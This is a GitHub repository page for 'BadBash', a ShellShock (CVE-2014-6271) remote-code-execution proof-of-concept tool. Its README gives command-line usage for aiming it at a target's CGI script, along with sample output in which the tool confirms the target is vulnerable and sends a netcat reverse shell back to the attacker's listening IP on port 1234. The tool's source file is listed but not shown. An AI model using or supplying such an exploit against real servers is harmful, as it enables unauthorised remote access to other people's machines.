Skip to content
CVE-2014-6271 (ShellShock) RCE PoC tool
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
BadBash.rb Create BadBash.rb Sep 26, 2014
LICENSE Initial commit Sep 26, 2014
README.md Update README.md Sep 26, 2014

README.md

BadBash

CVE-2014-6271 (ShellShock) RCE PoC tool

======= BadBash is a CVE-2014-6271 RCE exploit tool. The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234.

Developer : Andy Yang Version : 0.1.0 License : GPLv3

Orginal github project : https://github.com/RainMak3r/Rainstorm

================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h

BadBash - CVE-2014-6271 RCE tool by Andy Yang Basic version only checks for HTTP site Basic version only provides netcat reverse shell on port 1234

EXAMPLE USAGE:

 ./BBash.rb  -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
 ./BBash.rb  -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path            Full path of CGI page
-d, --Destination IP             Your IP address that listen to an inbound connection
-h, --help                       Display help

================================================================================================ Example of usage.

RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'

[Info] Checking if the target is vulnerable........

[Info] This may take up to 10 seconds........

[Info] Target is vulnerable!!!

[Info] Please use NC to listen on port 1234 for reverse shell..........

[Info] Exploiting for a reverse shell to connect 172.16.189.1:1234 via netcat ..........

You can’t perform that action at this time.